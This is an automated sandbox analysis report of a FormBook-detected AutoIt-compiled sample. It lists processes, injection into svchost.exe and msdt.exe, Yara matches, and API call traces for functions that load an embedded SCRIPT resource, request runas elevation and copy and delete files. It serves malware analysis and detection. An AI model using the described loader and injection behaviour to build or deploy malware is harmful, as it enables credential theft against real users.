Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:58:07
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rACq8Eaix6.exe"
Imagebase:	0x1d0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2492972011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2493551934.0000000003400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2494167980.0000000004600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:58:39
Start date:	11/01/2025
Path:	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe"
Imagebase:	0x200000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3912887466.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	01:58:41
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msdt.exe"
Imagebase:	0xa00000
File size:	389'632 bytes
MD5 hash:	BAA4458E429E7C906560FE4541ADFCFB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3913013738.0000000004080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3911338713.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3913163573.0000000004220000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	01:58:54
Start date:	11/01/2025
Path:	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe"
Imagebase:	0x200000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3915092997.0000000005700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	01:59:06
Start date:	11/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	6.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	72

Executed Functions

Function 00BD3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BD3B68
IsDebuggerPresent.KERNEL32 ref: 00BD3B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,00C952F8,00C952E0,?,?), ref: 00BD3BEB

Part of subcall function 00BD7BCC: _memmove.LIBCMT ref: 00BD7C06

Part of subcall function 00BE092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00BD3C14,00C952F8,?,?,?), ref: 00BE096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00BD3C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00C87770,00000010), ref: 00C0D281
SetCurrentDirectoryW.KERNEL32(?,00C952F8,?,?,?), ref: 00C0D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C84260,00C952F8,?,?,?), ref: 00C0D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00C0D346

Part of subcall function 00BD3A46: GetSysColorBrush.USER32(0000000F), ref: 00BD3A50
Part of subcall function 00BD3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00BD3A5F
Part of subcall function 00BD3A46: LoadIconW.USER32(00000063), ref: 00BD3A76
Part of subcall function 00BD3A46: LoadIconW.USER32(000000A4), ref: 00BD3A88
Part of subcall function 00BD3A46: LoadIconW.USER32(000000A2), ref: 00BD3A9A
Part of subcall function 00BD3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BD3AC0
Part of subcall function 00BD3A46: RegisterClassExW.USER32(?), ref: 00BD3B16

Part of subcall function 00BD39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BD3A03
Part of subcall function 00BD39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BD3A24
Part of subcall function 00BD39D5: ShowWindow.USER32(00000000,?,?), ref: 00BD3A38
Part of subcall function 00BD39D5: ShowWindow.USER32(00000000,?,?), ref: 00BD3A41

Part of subcall function 00BD434A: _memset.LIBCMT ref: 00BD4370
Part of subcall function 00BD434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BD4415

Strings

This is a third-party compiled AutoIt script., xrefs: 00C0D279
runas, xrefs: 00C0D33A

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 27fd1b13ef89e6fe334a4e1cd365d293e84aed933d3aee5a3e1a791eb64418b4
Instruction ID: 4937b7efd6787bb944a42e7284dafe03f60fb6e98a969b59ee156d6185028fba
Opcode Fuzzy Hash: 27fd1b13ef89e6fe334a4e1cd365d293e84aed933d3aee5a3e1a791eb64418b4
Instruction Fuzzy Hash: A251D670908648AEDF16EBB4DC59FEDBBF4EB05750F0440EBF412A22A2FA705645CB21

Function 00BD49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00BD49CD

Part of subcall function 00BD7BCC: _memmove.LIBCMT ref: 00BD7C06

GetCurrentProcess.KERNEL32(?,00C5FAEC,00000000,00000000,?), ref: 00BD4A9A
IsWow64Process.KERNEL32(00000000), ref: 00BD4AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00BD4AE7
FreeLibrary.KERNEL32(00000000), ref: 00BD4AF2
GetSystemInfo.KERNEL32(00000000), ref: 00BD4B23
GetSystemInfo.KERNEL32(00000000), ref: 00BD4B2F

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: eb58be945a12be5151d3ac76e78614d3d7a5d6037b14261729fd70e2b8e3feda
Instruction ID: c1414aa018e36e34191357ef5995b0b43d2c4c16beba6e125b049bacee69c159
Opcode Fuzzy Hash: eb58be945a12be5151d3ac76e78614d3d7a5d6037b14261729fd70e2b8e3feda
Instruction Fuzzy Hash: 8291A331989BC0DFC731DB6895902AAFFF5AF2A300B444AAED0D793B41E630A548D759

Function 00BD4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00BD4D8E,?,?,00000000,00000000), ref: 00BD4E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BD4D8E,?,?,00000000,00000000), ref: 00BD4EB0
LoadResource.KERNEL32(?,00000000,?,?,00BD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00BD4E2F), ref: 00C0D937
SizeofResource.KERNEL32(?,00000000,?,?,00BD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00BD4E2F), ref: 00C0D94C
LockResource.KERNEL32(00BD4D8E,?,?,00BD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00BD4E2F,00000000), ref: 00C0D95F

Strings

SCRIPT, xrefs: 00BD4EA6

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 08476b85f5d23a5de866243cf0d43ab1c2d15ea4fb82b7f8e7f93b0f5aa1279c
Instruction ID: 920f0cd7f839ad7dd1b3671c63bb76e435a4a537672415bf6a4141d5c2ef94bc
Opcode Fuzzy Hash: 08476b85f5d23a5de866243cf0d43ab1c2d15ea4fb82b7f8e7f93b0f5aa1279c
Instruction Fuzzy Hash: D51173B9240700BFD7298B65EC48F67BBB9FBC5711F10416DF405D6290DB71DC418661

Function 00BDFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: d0c381714b9e171f70c956090d985d893349e240f2503bba137a4c49e79cd25f
Instruction ID: 62560cc45efcf13fac70da3b4eeaa8df3c8b60ae8b97a6690513e8da2fd68bb2
Opcode Fuzzy Hash: d0c381714b9e171f70c956090d985d893349e240f2503bba137a4c49e79cd25f
Instruction Fuzzy Hash: 8D928B706183818FD724DF15C480B6AB7E1FF85304F1489ADE89A8B362D7B5EC85DB92

Function 00C3445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00C0E398), ref: 00C3446A
FindFirstFileW.KERNELBASE(?,?), ref: 00C3447B
FindClose.KERNEL32(00000000), ref: 00C3448B

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: ecbe05f504b6883f257927ba49119d4442ae5f409f0b9baabef8ffe8dacbf195
Instruction ID: 6b1e589d6cf6fe614927089f81f5104acb10d58bc447abfa1b3780b43048dd58
Opcode Fuzzy Hash: ecbe05f504b6883f257927ba49119d4442ae5f409f0b9baabef8ffe8dacbf195
Instruction Fuzzy Hash: 34E0D8764206006752186B38EC0D6ED775C9E05336F100729F935D20E0E77469409A96

Function 00BDE6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00C13E62

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: ecbf01a660207be7dcafba4eb3e9a45264b9f39c7bb7dba0a2c22926b75b36e2
Instruction ID: 18c911d7ba931462d47a2b6a218401187424d9e6a8beaadee486ea657fc74c3c
Opcode Fuzzy Hash: ecbf01a660207be7dcafba4eb3e9a45264b9f39c7bb7dba0a2c22926b75b36e2
Instruction Fuzzy Hash: 3BA24975A00206CBCB14DF54C480AADF7F2FB59314F6480AAE926AF351E775ED82DB90

Function 00BE09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BE0A5B
timeGetTime.WINMM ref: 00BE0D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BE0E53
Sleep.KERNEL32(0000000A), ref: 00BE0E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00BE0EFA
DestroyWindow.USER32 ref: 00BE0F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BE0F20
Sleep.KERNEL32(0000000A,?,?), ref: 00C14E83
TranslateMessage.USER32(?), ref: 00C15C60
DispatchMessageW.USER32(?), ref: 00C15C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C15C82

Strings

@GUI_CTRLHANDLE, xrefs: 00C14FE4
@GUI_WINHANDLE, xrefs: 00C14F8F
@TRAY_ID, xrefs: 00C1578F
@COM_EVENTOBJ, xrefs: 00C154F0
@GUI_CTRLID, xrefs: 00C14F3A

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 0cdcead930c10241a696b7f9e8da2654f073d7d0e4df31c29c2ef937ce14b9a7
Instruction ID: 0d374932d532d65b8e67f8a790ab418a45689967c7366c795eb6ee5a8fba8f8b
Opcode Fuzzy Hash: 0cdcead930c10241a696b7f9e8da2654f073d7d0e4df31c29c2ef937ce14b9a7
Instruction Fuzzy Hash: ADB2C070608781DFD728EF24C884BAEB7E1FF85304F14496DE499972A1DB70E985DB82

Function 00C39155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C38F5F: __time64.LIBCMT ref: 00C38F69

Part of subcall function 00BD4EE5: _fseek.LIBCMT ref: 00BD4EFD

__wsplitpath.LIBCMT ref: 00C39234

Part of subcall function 00BF40FB: __wsplitpath_helper.LIBCMT ref: 00BF413B

_wcscpy.LIBCMT ref: 00C39247
_wcscat.LIBCMT ref: 00C3925A
__wsplitpath.LIBCMT ref: 00C3927F
_wcscat.LIBCMT ref: 00C39295
_wcscat.LIBCMT ref: 00C392A8

Part of subcall function 00C38FA5: _memmove.LIBCMT ref: 00C38FDE
Part of subcall function 00C38FA5: _memmove.LIBCMT ref: 00C38FED

_wcscmp.LIBCMT ref: 00C391EF

Part of subcall function 00C39734: _wcscmp.LIBCMT ref: 00C39824
Part of subcall function 00C39734: _wcscmp.LIBCMT ref: 00C39837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C39452
_wcsncpy.LIBCMT ref: 00C394C5
DeleteFileW.KERNEL32(?,?), ref: 00C394FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C39511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C39522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C39534

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: f2a8ad562a32dd0bb37cbdd1942156211a9b57969657b02cc8e15770e2a59b78
Instruction ID: 06105c4d117f4a4742b339e67397e89ce4ca39386bb1c10d3b1a7a7f8ce4f2cc
Opcode Fuzzy Hash: f2a8ad562a32dd0bb37cbdd1942156211a9b57969657b02cc8e15770e2a59b78
Instruction Fuzzy Hash: C9C12CB1D00219ABDF21DF95CC85EEEB7B9EF45310F0040AAF609E7251EB709A858F65

Function 00BD3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BD3074
RegisterClassExW.USER32(00000030), ref: 00BD309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BD30AF
InitCommonControlsEx.COMCTL32(?), ref: 00BD30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BD30DC
LoadIconW.USER32(000000A9), ref: 00BD30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BD3101

Strings

+, xrefs: 00BD305D
0, xrefs: 00BD3056
TaskbarCreated, xrefs: 00BD30A4
AutoIt v3 GUI, xrefs: 00BD3090

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 3c85a11c0869f8603db1b4f5727331aa162c71131f42d723dba30018b7842278
Instruction ID: bb3a8a5a27b4b8cddbc356aade9f791b4df0544fbc1b26b1483512fd76bf2850
Opcode Fuzzy Hash: 3c85a11c0869f8603db1b4f5727331aa162c71131f42d723dba30018b7842278
Instruction Fuzzy Hash: 423136B5940349EFDB029FA8E889BDDBBF0FB0A311F14416EE590A62A0D7B50582CF55

Function 00BD3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BD3074
RegisterClassExW.USER32(00000030), ref: 00BD309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BD30AF
InitCommonControlsEx.COMCTL32(?), ref: 00BD30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BD30DC
LoadIconW.USER32(000000A9), ref: 00BD30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BD3101

Strings

+, xrefs: 00BD305D
0, xrefs: 00BD3056
TaskbarCreated, xrefs: 00BD30A4
AutoIt v3 GUI, xrefs: 00BD3090

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 5d7ab608115aed1fcddba3796b7e9fca4c945044b22fcf9ce63ec8547570f2a2
Instruction ID: e01b502bb71c515d1f8c0647fbd09832198fe45835287e85404268f4aedb28a0
Opcode Fuzzy Hash: 5d7ab608115aed1fcddba3796b7e9fca4c945044b22fcf9ce63ec8547570f2a2
Instruction Fuzzy Hash: 4D21E0B5941708AFDB01DFA4E888BDEBBF4FB08701F00412AF910A62A0D7B145858F95

Function 00BD708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BD4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C952F8,?,00BD37AE,?), ref: 00BD4724

Part of subcall function 00BF050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00BD7165), ref: 00BF052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BD71A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C0E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C0E909
RegCloseKey.ADVAPI32(?), ref: 00C0E947
_wcscat.LIBCMT ref: 00C0E9A0

Strings

\, xrefs: 00C0E9C3
\Include\, xrefs: 00BD7165
Software\AutoIt v3\AutoIt, xrefs: 00BD719E
Include, xrefs: 00C0E8BF, 00C0E900

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 5dca87c1693b593b1bd13b7cc9d9108d9f5d56fc7a9d449d83942692f62cf0e2
Instruction ID: 8d7f0735c1cb4dba054de9cda333fa57223e1a85143c055819e4eb360afca2b5
Opcode Fuzzy Hash: 5dca87c1693b593b1bd13b7cc9d9108d9f5d56fc7a9d449d83942692f62cf0e2
Instruction Fuzzy Hash: C87189715487019EC704EF69E885AAFBBE8FF89350F40096FF445872E1EB709948CB92

Function 00BD3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BD3A50
LoadCursorW.USER32(00000000,00007F00), ref: 00BD3A5F
LoadIconW.USER32(00000063), ref: 00BD3A76
LoadIconW.USER32(000000A4), ref: 00BD3A88
